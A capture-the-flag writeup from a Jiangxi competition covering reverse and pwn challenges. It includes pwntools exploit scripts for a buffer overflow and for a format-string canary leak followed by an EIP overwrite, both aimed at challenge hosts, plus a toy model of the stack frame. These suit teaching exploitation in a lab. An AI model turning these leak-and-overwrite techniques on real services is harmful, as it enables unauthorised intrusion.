
3rd Jiangxi CTF Reverse & Pwn Writeup


Reverse-Babyre

Drag the binary into IDA and look at the strings; the flag is stored in plain text:

CMISCCTF{Hello_CTF_Player_this_is_singin2}

Reverse-Crackme

Just brute-force it by re-running the binary until the output contains the flag:

from pwn import *
import re

# Re-run the binary with the same credentials until the flag prefix shows up.
for i in range(500):
    p = process("./crackme")
    p.sendlineafter(b'Hey give username\n', b'admin')
    p.sendlineafter(b'Give pass:\n', b'password')
    s = p.recv(50)
    p.close()
    print(s)
    m = re.search(rb'CMISCCTF\{[^}]*\}', s)
    if m:
        print(m.group(0))
        break

pwn_cmcc_stack

from pwn import *

# Send increasingly long runs of 0xdeadbeef until the overflow lands.
for i in range(200):
    # p = process("./bin")
    p = remote("118.26.128.67", 11525)
    payload = p32(0xdeadbeef) * i
    p.sendline(payload)
    p.interactive()

pwn_pwn_canary

Debugging with gdb shows that the canary sits 12 bytes below the saved EIP.

from pwn import *

# p = process('./canary')
p = remote('118.26.128.67', 31982)
e = ELF('./canary')

# Leak the canary through the format-string bug (7th stack argument).
p.sendline(b"%7$x")
canary = int(p.recv(8), 16)
# gdb.attach(p, "b * 0x804837a")

# 25 dwords fill the buffer, then the leaked canary goes back in place,
# 12 bytes of padding reach the saved EIP, which is overwritten with getflag.
payload = p32(e.sym['getflag']) * 25 + p32(canary) + b'B' * 12 + p32(e.sym['getflag'])
p.sendline(payload)
p.interactive()
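To show why the leak step is needed, here is an added toy model of the frame layout described above (not code from the writeup or the challenge binary). It uses the writeup's offsets (25-dword buffer, 4-byte canary, 12 bytes to the saved EIP); the canary value and the getflag address are constructed placeholders.

```python
import struct

# Layout taken from the writeup: a 25-dword buffer, then the 4-byte canary,
# then 12 bytes before the saved return address (EIP).
BUF_SIZE = 25 * 4
GAP_AFTER_CANARY = 12
RET_OFF = BUF_SIZE + 4 + GAP_AFTER_CANARY
GETFLAG = 0x08048600  # constructed placeholder, not the binary's real address


def p32(v):
    return struct.pack('<I', v)


class Frame:
    """Toy model of the vulnerable function's stack frame (not the real binary)."""

    def __init__(self, canary, saved_eip):
        self.canary = canary
        self.mem = bytearray(BUF_SIZE) + p32(canary) + b'\x00' * GAP_AFTER_CANARY + p32(saved_eip)

    def dword(self, off):
        return struct.unpack_from('<I', self.mem, off)[0]

    def fmt_leak(self):
        """What the %7$x leak prints: the canary as hex without leading zeros."""
        # Caveat: if the top nibble is 0 this is only 7 chars, so recv(8) in the
        # writeup's script would also swallow the newline and int(..., 16) fails.
        return '%x' % self.dword(BUF_SIZE)

    def read_and_return(self, data):
        """Unbounded copy into the buffer, then the function epilogue."""
        self.mem[:len(data)] = data           # overflow spills past the buffer
        if self.dword(BUF_SIZE) != self.canary:
            return 'stack smashing detected'  # __stack_chk_fail aborts here
        return self.dword(RET_OFF)            # value that ends up in EIP


def blind_overwrite(frame):
    """Overflow without knowing the canary: the check catches it."""
    return frame.read_and_return(p32(GETFLAG) * (RET_OFF // 4 + 1))


def leak_then_overwrite(frame):
    """Leak the canary first and write it back in place, as the writeup does."""
    canary = int(frame.fmt_leak(), 16)
    payload = p32(GETFLAG) * 25 + p32(canary) + b'B' * 12 + p32(GETFLAG)
    return frame.read_and_return(payload)
```

`blind_overwrite` ends in the canary check, while `leak_then_overwrite` returns `GETFLAG`, which is exactly the difference the `%7$x` step makes.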